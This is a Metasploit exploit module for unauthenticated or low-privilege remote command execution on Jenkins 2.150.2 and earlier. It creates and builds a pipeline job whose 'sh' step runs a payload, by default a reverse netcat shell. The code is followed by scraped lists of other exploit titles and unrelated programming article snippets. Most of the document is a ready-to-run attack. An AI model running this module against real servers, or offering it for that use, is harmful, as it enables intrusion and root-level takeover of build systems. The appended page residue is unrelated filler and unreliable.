##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',
'Description' => %q{
This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.
The vulnerability is exploited by a small script prepared in NodeJS.
The sh parameter allows us to run commands.
Sample script:
node {
sh "whoami"
}
In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.
Therefore, all users without console authority can run commands on the system as root privilege.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Jenkins <= 2.150.2', { }]],
'DisclosureDate' => 'Feb 11 2019',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' })) register_options(
[
OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),
OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),
], self.class)
end
##
# Jenkins activity check
## def check
res = send_request_cgi({'uri' => "/login"})
if res and res.headers.include?('X-Jenkins')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end def exploit
print_status('Attempting to login to Jenkins dashboard')
res = send_request_cgi({'uri' => "/script"})
if not (res and res.code)
fail_with(Exploit::Failure::Unknown)
end sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
@cookie = "#{sessionid}"
print_status("#{sessionid}") if res.code != 200
print_status('Logging in...')
##
# Access control and information
##
res = send_request_cgi({
'method' => 'POST',
'uri' => "/j_acegi_security_check",
'cookie' => @cookie,
'vars_post' =>
{
'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
'Submit' => 'Sign+in'
}
}) if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
print_error('User Login failed. If anonymous login is active, exploit will continue.')
end
else
print_status('No authentication required, skipping login...')
end
##
# Check Crumb for create pipeline
##
cookies = res.get_cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => "/view/all/newJob",
'cookie' => cookies
}) html = res.body
if html =~ /Jenkins-Crumb/
print_good("Login Successful")
else
print_status("Service found, but login failed")
exit 0
end crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last
print_status("Jenkins-Crumb: #{crumb}")
##
# Create Pipeline
##
res = send_request_cgi({
'method' => 'POST',
'uri' => "/view/all/createItem",
'cookie' => cookies,
'vars_post' =>
{
'name' => "cmd",
'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",
'from' => "",
'Jenkins-Crumb' => "#{crumb}",
'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"
}
}) ##
# Configure Pipeline
##
shell = payload.encoded
res = send_request_cgi({
'method' => 'POST',
'uri' => "/job/cmd/configSubmit",
'cookie' => cookies,
'vars_post' =>
{
'description' => "cmd",
'Jenkins-Crumb' => "#{crumb}",
'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",
'Submit' => "Save"
}
}) if res.code == 302
print_good("Pipeline was created and Node JS code was integrated.")
end
##
# Build Pipeline and Execute payload
##
print_status("Trying to get remote shell...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/job/cmd/build?delay=0sec",
'cookie' => cookies,
'vars_post' =>
{
'Jenkins-Crumb' => "#{crumb}"
}
})
handler
end
end
##
# End
##

[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  6. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  7. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  8. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  9. struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

随机推荐

  1. python下划线的5种含义

    本文介绍了Python中单下划线和双下划线("dunder")的各种含义和命名约定,名称修饰(name mangling)的工作原理,以及它如何影响你自己的Python类. 单下划 ...

  2. [leetcode]57. Insert Interval插入区间

    Given a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessa ...

  3. Js学习(6) 标准库-Array对象

    Array是Js的原生对象,同时也是一个构造函数,可以用它生成新的数组 用不用new结果都一样 var arr = new Array(2); // 等同于 var arr = Array(2); 但 ...

  4. PHP导出Excel表

    <?php/** * Created by PhpStorm. * User: admin * Date: 2019/3/16 * Time: 9:41 *///利用excel导出插件PHPEx ...

  5. 六、maven仓库中安装没有的jar包

    举例:安装dubbo.jar Dubbox 的 jar 包并没有部署到 Maven 的中央仓库中,大家在 Maven 的中央仓库中可以查找到 Dubbo 的最终版本是 2.5.3 , 阿里巴巴解散了 ...

  6. c#NPOI读取excel 比interop和Microsoft.Jet.OLEDB.4.0 之类 的好的多

    今天下午开始整理excel这块, 微软弄的那些库简直是个坑, 什么com注册之类的净是些报错. 在网上搜资料偶然碰见npoi ,好东西,值得使用 NPOI是指构建在POI 3.x版本之上的一个程序,N ...

  7. ping内网一台虚拟机延时很大(hyper-v虚拟机)的解决办法

    问题现象: ping 内网一台虚拟机延时很大,不稳定,造成业务系统响应慢.查看服务器上各种资源都正常. 解决办法: 在物理机上找到和hyper-v绑定的那个网卡,把“虚拟机队列”禁用掉就好了,如下图: ...

  8. spring mvc+mybatis 构建 cms + 实现UC浏览器文章功能

    最近公司在模拟UC浏览器做一个简单的cms系统,主要针对于企业内部的文章浏览需求,这边考虑用户大多用mobile浏览文章内容,故使用原生的ios和android进行开发,后面也会集成html5. 1. ...

  9. linux学习第八天 (Linux就该这么学)

    今天学了,mount 挂载,umount撤销挂载,.fdisk 命令 管理硬盘 交换分区swap,硬盘配额 xfs_quota命令 今天工作,手机看了,看的不全,回头看录播了.

  10. idea配置网络代理

    背景 公司限制连接外网,很多软件都被限制了,包括idea,只能通过代理上网. 使用代理上网,以往都是在IE的工具-Internet选项-连接里进行设置就OK了,谷歌浏览器啥的就可以上网了.但intel ...